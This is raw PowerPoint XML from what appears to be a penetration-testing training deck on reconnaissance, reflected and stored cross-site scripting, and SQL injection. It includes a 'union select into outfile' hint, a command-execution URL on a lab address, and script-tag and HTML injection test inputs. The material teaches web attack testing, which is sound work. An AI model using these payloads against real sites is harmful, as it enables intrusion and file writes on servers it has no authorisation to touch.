          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Hint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> : ‘ union all select &lt;input&gt; into outfile &lt;output&gt;#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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8381520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>http://192.168.56.10/test.php?cmd=ipconfig</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="771" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="772"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57200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>What is it?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="43732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2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Intelligence Gathering is performing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>reconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> against </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>a target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>to gather as much information as possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> to be utilized </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>when penetrating the target during the vulnerability assessment </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>and exploitation phases. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>more information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> you are able to </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>gather during this phase, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>more vectors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>of attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> you may be </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>able to use in the future</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29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98"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99"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CD3D1F9B-E639-4D7C-B654-A1083CFF002A}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>Cross Site Scripting Vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>(XSS)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What is it?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>are injected into the otherwise benign and trusted web sites.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>								[Reference : OWASP]</a:t>
            </a:r>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457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Reflected XSS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="778"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Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server. When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="7924320" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Output on the page and source-page</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="780" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="781" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="5721120" cy="3504960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="782" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048120" y="2819520"/>
            <a:ext cx="5638320" cy="3580920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Simple checks for XSS using Javascript tags &lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="785" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="5866920" cy="3504960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="786" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2911320" y="2795760"/>
            <a:ext cx="5775120" cy="3528720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8381520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Reflected XSS 
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Input : &lt;script&gt;alert(‘PENTEST')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="789" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295640"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="7619760" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Input : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>&lt;h1&gt;&lt;font color="#00FF00"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Alienware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>&lt;/font&gt;&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="792" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="6032160" cy="3695400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="793" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3290760" y="3048120"/>
            <a:ext cx="5395680" cy="3309480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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
Stored XSS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="795" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc.  The victim then retrieves the malicious script from the server when it requests the stored information.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
